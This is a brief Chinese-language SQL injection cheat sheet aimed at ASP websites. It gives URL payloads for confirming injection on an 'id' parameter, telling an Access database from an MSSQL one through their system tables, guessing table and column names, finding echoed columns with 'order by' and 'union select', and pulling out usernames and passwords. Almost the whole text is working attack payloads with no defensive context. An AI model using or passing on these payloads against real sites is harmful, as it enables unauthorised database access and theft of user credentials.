判断是否存在注入
http://URL.asp?id=24 and 1=1 返回了正常
http://URL.asp?id=24 and 1=2 返回了错误
注入存在
判断数据库是ACC或MSS:ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,MSS的系统表是sysobjects,在WEB环境下有访问权限。
http://URL.asp?id=24 and (select count(*) from sysobjects)>0
http://URL.asp?id=24 and (select count(*) from msysobjects)>0
若数据库是MSS,则第一条,网页,一定运行正常,第二条则异常;若是ACCESS则两条都会异常。
判断表名
http://URL.asp?id=24 and (select count(*) from 表名)>0
如果表名存在就会返回正常,反则错误。
判断列名:
and (select count(列名) from 已存在表名)>0
判断网站的回显位置:
order by N
union select 1,2,3…N from 已存在表名
猜用户名和密码长度;
根据回显位置替换列名就可以了